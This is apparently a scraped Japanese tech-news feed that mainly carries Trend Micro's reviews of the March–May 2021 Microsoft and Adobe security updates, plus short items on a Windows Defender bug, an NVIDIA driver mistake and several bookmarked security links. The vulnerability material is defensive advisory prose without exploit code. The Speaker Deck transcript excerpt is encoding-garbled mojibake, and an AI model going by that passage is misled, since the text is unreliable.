今月のリリースにはMicrosoft Exchange Serverのパッチが複数含まれていますが、その中には最近開催されたハッキングコンテスト「Pwn2Own」で公開された脆弱性に関連するものが含まれています。そのうち2つ(CVE-2021-31195、CVE-2021-31198)は、リモートコード実行の脆弱性です。これらはコンテストの参加者により発見された脆弱性と考えられますが、コンテストで実行された脆弱性攻撃は、ユーザの操作を必要としないものでした。一方Microsoftはユーザの操作を要すると記載しているため、一連のエクスプロイトチェーンのこの部分について評価しているのかもしれません。コンテストでは、複数の脆弱性を利用する攻撃の一部として、他になりすましの脆弱性とセキュリティ機能のバイパスの脆弱性も使用されました。コンテストで公開された脆弱性すべてに対して対処されたわけではないので、今後さらなるExchange Serverのパッチの公開が予想されます。

深刻度「緊急」レベルのパッチに目を向けると、残る2つのCVE-2021-31194およびCVE-2021-26419はどちらも、攻撃者が脆弱性を利用してコードを実行するためにユーザがWebサイトを閲覧する必要があります。1つは攻撃者がWebブラウザでOLEオートメーションを呼び出した場合に発生するもので、もう1つはInternet Explorer(IE)に影響を与える脆弱性です。どちらの場合も、攻撃者は何らかの方法でユーザを自身のWebサイトへ誘導する必要があります。

次に、深刻度「重要」のパッチを見ると、18件に何らかの形でリモートコード実行(RCE)の脆弱性が含まれています。そのうちの1つが「公開されている脆弱性」に該当しますが、公開されたのは数カ月前です。共通ユーティリティ(common_utils.py)については、12月にGitHubにアップデートがチェックインされました。Neural Network Intelligence のオープンソース・ツールキットを使用しているユーザは、バージョンが最新のものであることを確認してください。様々なOfficeコンポーネントのいくつかに、開封すると感染するタイプの脆弱性が存在します。Visual Studio Codeには3つのコード実行の脆弱性がありますが、これらはユーザにディレクトリ内の悪意のあるファイルを開封させる必要があります。もし攻撃者がそのような誘導に成功した場合、ログオンしているユーザの権限でコードを実行することができます。

もう1つのRCEの脆弱性は、ZDIのリサーチャーであるHossein Lotfiによって報告されたもので、Jet Red Database EngineとAccess Connectivity Engineに影響を与えます。この脆弱性に完全に対処するには、パッチを適用した上で、リモートデータベースへのアクセスを制限する必要があります。アクセス制限を行わなかった場合、データベースが潜在的なSQLアドホックあるいはSQLインジェクションの脆弱性にさらされる可能性があります。Microsoft社はKB5002984を公開し、アクセス制限に関するガイダンスを提供しています。

今月は11件の特権昇格(EoP)の脆弱性に対しパッチがリリースされました。そのほとんどがWindows Container Manager Serviceのものです。また、.NET CoreおよびVisual StudioのEoPの脆弱性については一般に公開されているとの記載がありますが、Microsoftは公開されている場所については言及していません。ZDI Programを通じて報告された脆弱性の1つは、Wallet Serviceに影響します。攻撃者は、ディレクトリジャンクションを作成することで、このサービスを悪用し、任意の場所にファイルを作成することができます。攻撃者は、この脆弱性を利用して特権を昇格させ、SYSTEMのコンテキストでコードを実行することができます。また、ZDIのリサーチャーLucas Leongは、Windows Graphicsコンポーネントに存在する2つのEoPの脆弱性を報告しました。脆弱性は、Palette and Font Entry オブジェクトの処理に起因します。

今月のリリースには、前述のものを含め、情報漏えい(Info)の脆弱性に対するパッチが10件含まれています。ほとんどの場合、これらは不特定のメモリ内容の情報漏えいにつながるだけですが注意すべき例外もあります。SharePointの情報漏えいの脆弱性は、ファイルシステムへの不正アクセスや個人識別情報(PII)の漏えいにつながる可能性があります。繰り返しますが、ワイヤレスネットワークの情報漏えいの脆弱性は、この中で最も深刻なものです。

5月には8件のなりすまし(Spoofing)の脆弱性があり、そのうち2つは上述のワイヤレスネットワークの情報漏えいの脆弱性を報告したリサーチャーによって報告されています。これらもワイヤレスコンポーネントに影響を与えますが、どのようにしてなりすましが発生するのかは明らかではありません。これらも2020年に確認されていた脆弱性なので、やはりMicrosoftがしばらくの間対処に取り組んでいたことを示しています。今月修正される他のなりすましの脆弱性は、SharePoint Server、Bluetooth、Skype for Business and Lyncに影響を与えます。

前述のExchange Serverセキュリティ機能バイパスに加え、SMBクライアントのセキュリティ機能バイパスに対する修正もあります。SMBv2では、ゲストフォールバックがデフォルトでは無効になっていません。このパッチでは、ゲストフォールバックのアクセスを無効にして、OSおよびグループポリシーの設定を実施します。また、レジストリを介してゲストのアクセスを無効にすることもできます。5月のリリースは、Dynamics Finance and Operationsにおけるクロスサイトスクリプティング(XSS)の脆弱性と、Windows Desktop Bridgeにおけるサービス拒否(DoS)の脆弱性で締めくくられています。

最後に、ervicing Stack のアドバイザリ(ADV990001)がすべてのバージョンのWindows向けに修正されました。その他、今月は追加のアドバイザリはリリースされていません。

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

The post 2021年5月のセキュリティアップデートレビュー解説 first appeared on トレンドマイクロ セキュリティブログ.

joan-gamell-XmZ4GDAp9G0-unsplash

特定バージョンのWindows Defenderで数千以上ものファイルを勝手に生成するバグ

Windows Defenderを標準のセキュリティシステムとして利用している場合、特定のバージョンで勝手にファイルが作成され、Windowsのシステムストレージ容量が不足する可能性があるとの指摘が出ている。今回発見されたWindows Defenderのバグによると、何千もの小さなファイルを

C:\ ProgramData \ Microsoft \ Windows Defender \ Scans \ History \ Store

フォルダ内に作成、Windows 10ストレージスペースをギガ単位で浪費するとしている。BetaNewsの記事によれば、一晩で400万個のファイルが作成され、11GBもの容量を占有したとする例もあるようだ。このバグはWindowsDefenderのバージョン1.1.18100.5で発生する。18100.6ではすでに対処されている模様。WindowsDefenderのバージョン確認方法に関してはマイナビの記事内にて言及されている(BetaNewsBleepingComputerマイナビ)。

すべて読む | セキュリティセクション | セキュリティ | バグ | Windows | ストレージ | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
Windows 10 Insider Preview、エクスプローラーで表示されるシステムアイコンを刷新 2021年03月26日
Windows 10 Insider Preview、初の21H1ビルドが提供開始 2021年02月20日
Microsoftのマルウェア対策エンジンに12年以上前から存在した脆弱性 2021年02月16日
Windowsのインストールイメージに適用可能なMicrosoft Defenderのアップデートパッケージが公開 2020年10月05日
Microsoft、Windows Defender ウイルス対策を無効にするレジストリ設定を削除 2020年08月22日
Microsoft Defender Antivirus、Microsoft関連ホストが指定されたhostsファイルを脅威として検出 2020年08月07日

h-heyerlein-ndja2LJ4IcM-unsplash

Go をセキュアに書き進めるための
「ガードレール」を整備しよう / Let’s Build Security Guardrails For Your Go Programs! – Speaker Deck

Go をセキュアに書き進めるための
「ガードレール」を整備しよう / Let's Build Security Guardrails For Your Go Programs! - Speaker Deck

Go をセキュアに書き進めるための
「ガードレール」を整備しよう / Let's Build Security Guardrails For Your Go Programs! - Speaker Deck

Transcript (P�ΛηΩϡΞʹॻ͖ਐΊΔͨΊͷ� ʮΨʔυϨʔϧʯΛ੔උ͠Α͏ (P�$POGFSFODF������4QSJOH�#��4 ถ಺�وࢤ���:0/&6$)* �5BLBTIJ� גࣜձࣾ�'MBUU�4FDVSJUZ �������TIJGU�KT�JOGP (P�ΛηΩϡΞʹॻ͖ਐΊΔͨΊͷʮΨʔυϨʔϧʯΛ੔උ͠Α͏ ��XIPBNJ� 4FF��IUUQT���TIJGU�KT�JOGP ถ಺�وࢤ� [email protected] ����גࣜձࣾ�'MBUU�4FDVSJUZ� ࠷ۙʰ8FC�ϒϥ΢βηΩϡϦςΟʱͱ͍͏ॻ੶Λग़͠·ͨ͠ � �������TIJGU�KT�JOGP (P...

はてなブックマーク - Go をセキュアに書き進めるための
「ガードレール」を整備しよう / Let's Build Security Guardrails For Your Go Programs! - Speaker Deck はてなブックマークに追加

h-heyerlein-ndja2LJ4IcM-unsplash

HomebrewのCaskリポジトリを介した任意コード実行 – RyotaK’s Blog

HomebrewのCaskリポジトリを介した任意コード実行 - RyotaK's Blog

HomebrewのCaskリポジトリを介した任意コード実行 - RyotaK's Blog

English version is available here: https://blog.ryotak.me/post/homebrew-security-incident-en/ (公式インシデント報告はこちらから読むことができます: https://brew.sh/2021/04/21/security-incident-disclosure/) はじめにHomebrewプロジェクトはHackerOne上で脆弱性開示制度(Vulnerability Disclosure Program)...

はてなブックマーク - HomebrewのCaskリポジトリを介した任意コード実行 - RyotaK's Blog はてなブックマークに追加

sora-sagano-WFSap6CIXuw-unsplash

2021年4月のセキュリティアップデートレビュー解説

今月第2火曜日となった2021年4月13日は、Adobe社およびMicrosoft社から最新のセキュリティ更新プログラムがリリースされました。これらのセキュリティ更新プログラムの詳細について確認しましょう。特に、MicrosoftのWin32k の特権昇格の脆弱性「CVE-2021-28310」はゼロデイ時点での悪用発生の事実をMicrosoftが確認しています。法人組織の管理者の方は、確実に修正プログラムの適用を行ってください。

Adobe社による2021年4月のセキュリティパッチ

4月にAdobe社は、「Adobe Photoshop」、「Digital Editions」、「RoboHelp」、「Bridge」に確認された10件の脆弱性に対処する4つのセキュリティパッチをリリースしました。Bridgeのアップデートでは、6つの脆弱性について修正されました。これらはすべてトレンドマイクロが運営する脆弱性発見・研究コミュニティ「Zero Day Initiative(ZDI)」による「ZDI program」を通して発見されたものです。このうち4つは深刻度「Critical(緊急)」に分類されており、悪用された場合、攻撃者によって任意のコードが実行される可能性があります。Photoshop用のパッチでは、「緊急」に分類される2つの脆弱性が修正されています。これらはバッファオーバーフローの脆弱性で、いずれも任意のコードを実行される可能性があります。Digital Editionsのアップデートでは、「緊急」に該当する特権昇格の脆弱性が修正されており、悪用された場合任意のファイルシステムへの書き込みが可能になります。最後に、RoboHelpのパッチでは、特権昇格の脆弱性が1つ修正されています。Adobe社が対処した脆弱性はいずれも公開時点で一般に公開されているもの、あるいは悪用の事実を確認されているものではありません。

Microsoftによる2021年4月のセキュリティ更新プログラム

4月Microsoft社は、「Microsoft Windows」、「Edge(Chromium版)」、「Azure」および「Azure DevOps Server」、「Microsoft Office」、「SharePoint Server」、「Hyper-V」、「Team Foundation Server」、「Visual Studio」、そして「Exchange Server」を対象とする114件の脆弱性に対処するためのパッチをリリースしました。これは今年に入ってMicrosoft社が1カ月の間に対応した脆弱性の数としては最多で、昨年の4月よりも多くなっています。これらの脆弱性のうち、合計5つがZDI programを通じて確認されたものです。なお、今月対処された脆弱性のうち最近開催されたハッキングコンテスト「Pwn2Own」で公開されたものはありません。114件の脆弱性のうち、19件が「緊急」、88件が「Important(重要)」、1件が「Moderate (警告)」レベルの深刻度と評価されています。さらにEdge(Chromium版)に影響を与える6つの脆弱性については、最近のアップデートで対処済みとなっています。

Microsoft社によると、1つの脆弱性は現在攻撃での悪用が確認されており、他の4つの脆弱性はリリース時にすでに一般に公開されています。

今月のアップデートで特に注目すべき脆弱性の中でも、悪用の事実を確認されていると報告されるものから詳しく見ていきましょう。

CVE-2021-28310 – Win32k の特権昇格の脆弱性

この脆弱性は、現在悪用が確認されている脆弱性の中で4月にパッチが適用された唯一の脆弱性です。この脆弱性は、攻撃者が細工したプログラムを標的コンピュータ上で実行することで、特権を昇格させることが可能になります。これは、条件として攻撃者はシステムにログオンするか、正規ユーザを騙し攻撃者に代わってコードを実行させる必要があります。カスペルスキーのリサーチャーの報告から、おそらくマルウェアに利用されていると推察されます。このタイプの脆弱性は通常、ブラウザやPDFの脆弱性など他の脆弱性と組み合わせ、システムを乗っ取るために使用されます。

CVE-2021-28480/28481 – Microsoft Exchange Server のリモートコード実行の脆弱性

どちらの脆弱性も 共通脆弱性評価システム(CVSS )で 9.8 に分類されており、内容も同一です。どちらのコード実行の脆弱性も認証およびユーザの操作を必要としません。攻撃経路が「ネットワーク」と記載されていることから、これらの脆弱性は少なくともExchangeサーバ間ではワーム活動が可能であると考えられます。この2つの脆弱性のCVSSスコアは、今年になって悪用が確認されているExchangeの脆弱性よりも高くなっています。これら2つの脆弱性は、米国国家安全保障局(National Security Agency)によって報告されています。また、これらの脆弱性がMicrosoftによる悪用可能性指標の最高評価を付与されていることを考慮すると、ゆくゆくは悪用される脆弱性であると考えられます。できるだけ早くシステムをアップデートしてください。

CVE-2021-28329 他 – リモートプロシージャコールランタイムにおけるリモートコード実行の脆弱性

今月のリリースには、この名称の脆弱性が27件含まれており、説明とCVSSスコアはすべて同じです。しかし、深刻度が「緊急」に分類されているものは12件、「重要」とされているのは15件です。これまでに確認されたリモートプロシージャコール(RPC)の脆弱性では、特別に細工したRPCリクエストを、攻撃者が対象システムに送信する必要があります。悪用に成功すると、別のユーザのコンテキストでコードが実行されます。「重要」評価の脆弱性では、「緊急」評価の脆弱性に比べユーザの権限が低い可能性がありますが、記述からはわかりません。いずれにしても、これらの脆弱性を報告したリサーチャーは、相当な数の攻撃対象を発見したことになります。

CVE-2021-28444 – Windows Hyper-V セキュリティ機能バイパスの脆弱性

このセキュリティ機能のバイパスにより、攻撃者は Hyper-V の 「Router Guard」 設定を迂回できる可能性があります。Router Guardは、ゲストOSがネットワーク上でルータサービスを提供することがないよう設計されています。Windowsをルータとして設定し、物理システムや仮想システム上でパケットを不正な場所に再ルーティングしたり(例:「Man-In-The-Middle(中間者)攻撃」)、単にトラフィックをブラックホールルーティングしたりできることは、あまり知られていません。Hyper-Vを使用している場合は、設定が間違っているだけであっても混乱を生じさせる可能性がありますので、必ずパッチを適用してください。

Microsoft社による2021年4月の更新プログラムで対処している脆弱性一覧はこちらから確認してください。なお、すでに対処済みとなっているEdge(Chromium版)の6つの脆弱性は含まれていません。

他の「緊急」レベルのパッチには、報告済みの脆弱性同様に深刻な、Exchange用の2つの追加パッチがあります。今月は、Office 365の各バージョンが影響を受けるExchangeの脆弱性はありません。これまでの脆弱性と同様に、これらの脆弱性はオンプレミスのインストールにのみ影響します。また、Microsoft社は、セキュリティ更新プログラムに関する追加情報を提供しています。Exchangeを利用している方は、ぜひご一読ください。

Azure Sphereに影響を与える脆弱性がありますが、特にアクションは必要ないでしょう。Azure Sphereを実行しているデバイスはインターネットに接続されていれば、自動で更新プログラムが適用されるからです。デバイスが接続されていない場合は、これらのアップデートが適用されていることを確認する必要があります。最後の2つの「緊急」レベルのパッチは、Windows Media Video Decoderコンポーネントの脆弱性を修正するものです。これらについては、対象システム上で、ログオンしているユーザレベルで攻撃者が任意のコード実行を行うためには、特別に細工されたメディアを開くようにユーザを誘導する必要があります。

今月リリースされている他の脆弱性を見ると、半分以上がリモートコード実行(RCE)の脆弱性に関連していることがわかります。これらの脆弱性は、上記の他、主にOfficeやWindowsのコンポーネントに影響を与えます。中でも特に目を引くのは、Outlookのメモリ破損の脆弱性で、ユーザの操作が必要であるとはいえ、コード実行につながる恐れがあります。また、Visual Studio向けにもいくつかのパッチが公開されています。これらの脆弱性についても、何らかの形でユーザの操作が必要となります。Visual Studio Code GitHub Pull Requests and Issues Extension向けに1つのパッチが公開されていますが、攻撃者がこの脆弱性をどのように利用するのかは不明です。また、Visual Studio Code Kubernetes Toolsの脆弱性についても同様です。最後に注意すべきリモートコード実行の脆弱性は、GDI+コンポーネントに影響を与えるものです。これらはやや不可解です。RCEと記載されているにもかかわらず、攻撃経路は「ローカル」と記載されており、ユーザの操作は必要ありません。画像を閲覧したり開いたりする以外の方法でこのバグが引き起こされることを示している可能性が推測されますが、詳細については記載されていません。

特権昇格の脆弱性は19件あり、中には一般に知られている2つの脆弱性が含まれています。1つはAzure ms-rest-nodeauthライブラリに、もう1つはRPC Endpoint Mapper Serviceに存在しています。また、Hyper-Vにも特権昇格の問題がありますが、攻撃者がどこからどこまで昇格するのかは明らかにされていません。これらの脆弱性の大半は、悪用するためには攻撃者が対象システムにログオンし、自身でコードを実行する必要があります。前述のとおり、これらの脆弱性は通常、システムを乗っ取るために別のコード実行の脆弱性と組み合わせて利用されます。

また、今月のリリースでは、一般に知られている「警告」レベルのNTFSのサービス拒否(DoS)の脆弱性 を含む、9つのDoSの脆弱性に対処するパッチが含まれています。もう一つのDoSの脆弱性は、TCP/IPドライバに影響を与えるものです。攻撃者は、特別に細工したパケットを対象システムに送信することでDoSを引き起こすことができるようですが、ブルースクリーンになるのか、システムが応答しなくなるのかは明らかにされていません。この他にも、SharePoint、AppX Deployment server、Hyper-V、その他のWindowsコンポーネントにもDoSの脆弱性が存在します。

今月最後に公表された脆弱性は、Windows インストーラの情報漏えいの脆弱性です。この脆弱性が悪用されると、攻撃者によるファイルシステムへの不正アクセスが可能になるおそれがあります。今月パッチが適用された情報漏えいの脆弱性は全部で17件あり、そのほとんどが不特定のメモリ内容の漏えいにつながるものです。例外は、Azure DevOps Serverに影響する脆弱性です。この脆弱性が悪用されると、パイプラインの構成変数やシークレットが漏えいする可能性があります。また、Excelの情報漏えいの脆弱性に対処するパッチもリリースされています。脆弱性を利用するには、特別に細工したファイルをユーザにExcelで開かせる必要がありますが、「機密情報」として何が漏えいするのかは明らかになっていません。

セキュリティ機能のバイパスについては、Windows Early Launch Antimalware(通称ELAM)Driverに対し2つのパッチが提供されています。いずれの脆弱性も、どのようなセキュリティ機能がバイパスされるかは明らかにされていません。その他のバイパスの脆弱性は、Azure AD Web Sign-inと Windows WLAN AutoConfig Service に影響を与えます。これらの脆弱性についても、攻撃者によって何がバイパスされる可能性があるのかについては記載されていません。

今月のリリースは、2つのなりすましの脆弱性に対処するパッチで最後となっています。1つ目は、Azure DevOps ServerとTeam Foundation Servicesに影響するもの、もう1つは、Windows インストーラに影響を与えるものです。これらの脆弱性は、どちらも詳説されていませんが、CVSSスコアは6を超えているため、無視することはできません。

最後に、Servicing Stackに関するアドバイザリ(ADV990001)が、複数のバージョンWindows向けに改訂されました。その他、今月は追加のアドバイザリはリリースされていません。

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

The post 2021年4月のセキュリティアップデートレビュー解説 first appeared on トレンドマイクロ セキュリティブログ.
h-heyerlein-ndja2LJ4IcM-unsplash

PHP Russia 2021

PHP Russia is the only Russian conference focused on PHP. It will be held in Moscow 28th June 2021. Main topics are PHP ecosytem (PHP itself, standards, frameworks, libraries and OpenSource) and major players experience in building complex projects using best practices and modern approaches.

We expect 600+ attendees and 20+ speakers!

Our audience consists of applications developers, API developers, CTO’s, CEO’s, fullstack developers, etc.

The program is designed by the developer community, representatives of large companies from Runet and around the world, and by tech developers and community activists. The selection of talks is multi-layered and complex — the Program Committee selects the best talks from the received applications unanimously according to several criteria.

h-heyerlein-ndja2LJ4IcM-unsplash

GitHub – hasherezade/malware_training_vol1: Materials for Windows Malware Analysis training (volume 1)

GitHub - hasherezade/malware_training_vol1: Materials for Windows Malware Analysis training (volume 1)

GitHub - hasherezade/malware_training_vol1: Materials for Windows Malware Analysis training (volume 1)

Materials for Windows Malware Analysis training (volume 1) ? WARNING: work in progress! More material will be added gradually. Content The goal of this training it to build understanding of various common techniques used by malware. It contains elements of programming as well as reverse engineer...

はてなブックマーク - GitHub - hasherezade/malware_training_vol1: Materials for Windows Malware Analysis training (volume 1) はてなブックマークに追加

h-heyerlein-ndja2LJ4IcM-unsplash

12 Unnecessary Windows Programs and Apps You Should Uninstall

12 Unnecessary Windows Programs and Apps You Should Uninstall

12 Unnecessary Windows Programs and Apps You Should Uninstall

Wondering which Windows 10 apps to uninstall? Here are several unnecessary Windows 10 apps, programs, and bloatware you should remove. Out of all the software on your computer, how many programs do you actually use regularly? Most people keep a fair amount of unnecessary software installed on the...

はてなブックマーク - 12 Unnecessary Windows Programs and Apps You Should Uninstall はてなブックマークに追加

sora-sagano-WFSap6CIXuw-unsplash

NVIDIA、RTX 3060の制限解除ドライバーを誤ってリリース。その影響でアキバから在庫消える

headless 曰く、

NVIDIAがRTX 3060のベータ版ドライバーで暗号通貨Ethereum採掘時のハッシュレート制限を解除したと話題になったが、誤って開発用コードをリリースしてしまったものだったそうだ(The Vergeの記事[1][2]Neowinの記事)。

NVIDIAではゲーマーが入手しやすくするためとして、ハッシュレート制限を発表。ドライバーだけの問題ではなく、ドライバーとチップ、BIOS(ファームウェア)のセキュアなハンドシェイクが行われるため容易には迂回できないと説明していた。しかし、PC Watchが具体的な内容には触れなかったもののドライバーやBIOSの改造なしに迂回する方法が発見されたと報じ、ComputerBaseがWindows Insider Programを通じてリリースされたベータ版ドライバーGeForce 470.05を使用するだけで迂回できることを確認していた。

NVIDIAによれば、470.05には内部の開発向けに一部の構成でRTX 3060のハッシュレート制限を解除するコードが誤って含まれていたという。ドライバーは削除されているが、既にオンライン上で共有されており、NVIDIAがこのドライバーの使用を止めることはできないとみられている。

AKIBA PC Hotline!によると、制限をかけたことで市場に出回っていたGeForce RTX 3060が、このベータ版ドライバ流出を受けて、秋葉原でも16日に一気に在庫がなくなったそうだ。記事によると16日だけで50本以上売れた店舗もあるそうだ(AKIBA PC Hotline!)。

すべて読む | セキュリティセクション | ハードウェア | ソフトウェア | グラフィック | バグ | 暗号 | お金 | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
Linus Sebastian氏、NVIDIAのマイニング対策を「ゲーマーをかばうフリをしている」と批判 2021年02月26日
NVIDIAがマイニング専用GPU「CMP HX」を発表。映像出力を省きシステムも効率化 2021年02月23日
品不足が予想される「GeForce RTX 3060」、暗号資産マイニング性能が強制半減される仕様に 2021年02月19日

h-heyerlein-ndja2LJ4IcM-unsplash

2021年3月のセキュリティアップデートレビュー解説

2021年に入り三度目の第2火曜日となった3月9日には、Adobe社およびMicrosoft社からセキュリティ更新プログラムが提供されました。これらのセキュリティ更新プログラムの詳細について確認しましょう。

■Adobe社による2021年3月のセキュリティパッチ

Adobe社は3月、「Adobe Connect」、「Creative Cloud Desktop」、「Framemaker」に確認された8つの脆弱性に対処するための3つのセキュリティパッチをリリースしました。これらの脆弱性のうち 2 つは、トレンドマイクロが運営する脆弱性発見・研究コミュニティ「Zero Day Initiative(ZDI)」による「ZDI program」を通して発見されたものです。Framemaker のアップデートは、リモートコード実行につながる可能性のある境界外(Out-of-Bounds、OOB)読み取りの脆弱性が 1 つ修正されています。Creative Cloud のアップデートでは、深刻度レベル「緊急(Critical)」の脆弱性が3つ修正されています。これらの脆弱性のうち2つはコード実行につながる可能性があり、もう1つは特権昇格につながる可能性があります。Adobeが3月に公開したパッチの最後のものは、Adobe Connectにおける「緊急」レベルの脆弱性1つと、「Important(重要)」レベルの脆弱性3つに対処しています。「緊急」に分類された脆弱性は任意のコード実行につながる可能性があり、他の脆弱性はすべてクロスサイトスクリプティング(XSS)の脆弱性です。Adobe社が対処した脆弱性はいずれも、公開時点で、一般に公開されているもの、あるいは悪用の事実を確認されているものに該当していません。

最初のリリースの後、Adobe社はさらに「PhotoShop」と「Animate」の9つの脆弱性に対処するパッチを公開しました。Animateのパッチでは、深刻度「緊急」の脆弱性2つと深刻度「重要」の脆弱性5つが修正されています。緊急レベルの脆弱性はバッファオーバーフローでコード実行が可能となり、重要レベルの脆弱性は情報漏えいの可能性があります。 PhotoShopのパッチでは、コードの実行が可能になる可能性のある緊急レベルの脆弱性2つが修正されています。公開時点では、いずれの問題も公表されておらず、活発な攻撃を受けていません。これらも、一般に公開されている、あるいは悪用の事実を確認されている脆弱性には該当していません。

■Microsoftによる2021年3月のセキュリティ更新プログラム

Microsoft社は3月の第1週、「Exchange」の7つの脆弱性に対処する緊急パッチをリリースし、通常より早い対応をとりました。月例のパッチチューズデーを待たずしてパッチがリリースされた理由は脆弱性のうち4つについて、悪用の事実が確認されているためです。これらの脆弱性に関する詳細はこちらの記事にて紹介しています。オンプレミスでExchangeを使用している場合は、公開された指示に従ってできるだけ早くパッチを適用する必要があります。今回Microsoftは、サポート対象外のバージョンの Exchange に対してもパッチを提供するという異例の措置をとっています。これは、これらのアップデートを無視することは大変危険であることを示しています。

Microsoft社は3月分として、「Microsoft Windows」のコンポーネント、「Azure」および「Azure DevOps」、「Azure Sphere」、「Internet Explorer(IE)」および「Edge(EdgeHTML)」、「Exchange Server」、「Office」および「Office Services」と「Web Apps」、「SharePoint Server」、「Visual Studio」、および「Windows Hyper-V」を対象とする89件の脆弱性に対処するためのパッチをリリースしました。これら89件の脆弱性には先週リリースされた7つのExchange の脆弱性が含まれています。これらの脆弱性のうち、合計15件がZDI programを通じて発見されています。89件のうち、14件が「緊急」、75件が「重要」となっています。Microsoft社によると、リリース時点で、これらの脆弱性のうち2件はすでに一般に公開されており、5件については悪用の事実を確認済み、として報告されています。

なお、これらの脆弱性の数には、最近の更新でパッチが適用されたEdge ブラウザの Chromium バージョンの脆弱性は含まれていないことに注意してください。このブラウザのバージョン 89 が3月第1週にリリースされています。

今月のアップデートの中で特に注目すべき脆弱性をいくつかご紹介します。

CVE-2021-26411 – Internet Explorer のメモリ破損の脆弱性

この脆弱性は、特別に細工された HTML ファイルを閲覧した場合に、攻撃者が影響を受けるシステム上でコードを実行できるようになるInternet Explorer (IE)と Edge (HTML ベースのEdge)のバグです。Microsoft社ではリリース時点で、この脆弱性は一般に公開および悪用の事実を確認済みとしています。Exchange のバグほど影響力は大きくありませんが、Microsoft のブラウザを使用している企業組織は、このパッチを迅速に適用する必要があります。この脆弱性の悪用に成功すると、ログオンしたユーザのレベルでコードが実行される可能性があるため、管理者権限のアカウントでWebを閲覧しないよう注意されています。

CVE-2021-26897 – Windows DNS サーバのリモートコード実行の脆弱性

DNSサーバのリモートコード実行(Remote Code Execution、RCE)の脆弱性は2カ月連続で公開されており、今月は複数報告されています。合計で5つのバグがDNSサーバのリモートコード実行の脆弱性として公開されていますが、この脆弱性だけが「緊急」に分類されています。いずれも、Secure Zone Update の有効化によって悪用に成功される可能性が低くなりますが、完全に防ぐことができるわけではないことに注意してください。これは、動的なアップデートがこれらの脆弱性の悪用に関与している可能性があることを示唆しています。これら5件の脆弱性はすべて共通脆弱性評価システム(CVSS )で9.8と記載されており、DNSサーバ間でワーム活動が可能になる可能性があります。これらの更新プログラムのテストおよび適用は優先順位を上げ確実に実行してください。

CVE-2021-26867 – Windows Hyper-Vの リモートコード実行の脆弱性

この脆弱性により、認証された攻撃者が Hyper-V サーバ上でコードを実行できる可能性があります。CVSS は9.9 と記載されているものの、この脆弱性は Plan-9 ファイルシステムを使用している場合にのみ該当します。Microsoft社はこの脆弱性の影響を受ける他の Hyper-V クライアントについて公表していませんが、 自組織でPlan-9 を使用している場合、できるだけ早くパッチを適用してください。

CVE-2021-27076 – Microsoft SharePoint Serverのリモートコード実行の脆弱性

この脆弱性は     ZDI programを通して確認されたコード実行の脆弱性です。攻撃者が悪用を成功させるためには、SharePoint サーバでサイトを作成または変更することが可能でなければなりません。しかしながら、SharePoint の初期設定では、認証されたユーザがサイトを作成することができます。その場合、そのユーザはこのサイトの所有者となり、必要な権限をすべて持つことになります。この脆弱性は、過去にZDIのブログでも紹介しているSharePointの脆弱性と類似していますが、近日中にさらに詳細解説をする予定です。

以下は、Microsoft社による2021年3月の更新プログラムで対処している脆弱性一覧です。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 DOS
CVE-2021-26411 Internet Explorer のメモリ破損の脆弱性 緊急 8.8 はい はい RCE
CVE-2021-26855 Microsoft Exchange Server のリモートコード実行の脆弱性 緊急 9.1 いいえ はい RCE
CVE-2021-26857 Microsoft Exchange Server のリモートコード実行の脆弱性 緊急 7.8 いいえ はい RCE
CVE-2021-27065 Microsoft Exchange Server のリモートコード実行の脆弱性 緊急 7.8 いいえ はい RCE
CVE-2021-26858 Microsoft Exchange Server のリモートコード実行の脆弱性 重要 7.8 いいえ はい RCE
CVE-2021-27077 Windows Win32k の特権昇格の脆弱性 重要 7.8 はい いいえ EoP
CVE-2021-27074 Azure Sphere の未署名コード実行の脆弱性 緊急 6.2 いいえ いいえ RCE
CVE-2021-27080 Azure Sphere の未署名コード実行の脆弱性 緊急 9.3 いいえ いいえ RCE
CVE-2021-21300 Git for Visual Studio のリモートコード実行の脆弱性 緊急 8.8 いいえ いいえ RCE
CVE-2021-24089 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 緊急 7.8 いいえ いいえ RCE
CVE-2021-26902 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 緊急 7.8 いいえ いいえ RCE
CVE-2021-27061 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 緊急 7.8 いいえ いいえ RCE
CVE-2021-26412 Microsoft Exchange Server のリモートコード実行の脆弱性 緊急 9.1 いいえ いいえ RCE
CVE-2021-26876 OpenType フォントのリモートコード実行の脆弱性 緊急 8.8 いいえ いいえ RCE
CVE-2021-26897 Windows DNS Serverのリモートコード実行の脆弱性 緊急 9.8 いいえ いいえ RCE
CVE-2021-26867 Windows Hyper-Vのリモートコード実行の脆弱性 緊急 9.9 いいえ いいえ RCE
CVE-2021-26890 Application Virtualizationのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27075 Azure Virtual Machineの情報漏えいの脆弱性 重要 6.8 いいえ いいえ Info
CVE-2021-24095 DirectX の特権昇格の脆弱性 重要 7 いいえ いいえ EoP
CVE-2021-24110 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27047 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27048 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27049 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27050 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27051 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27062 HEVC ビデオ拡張機能のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27085 Internet Explorerのリモートコード実行の脆弱性 重要 8.8 いいえ いいえ RCE
CVE-2021-27053 Microsoft Excelのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27054 Microsoft Excelのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
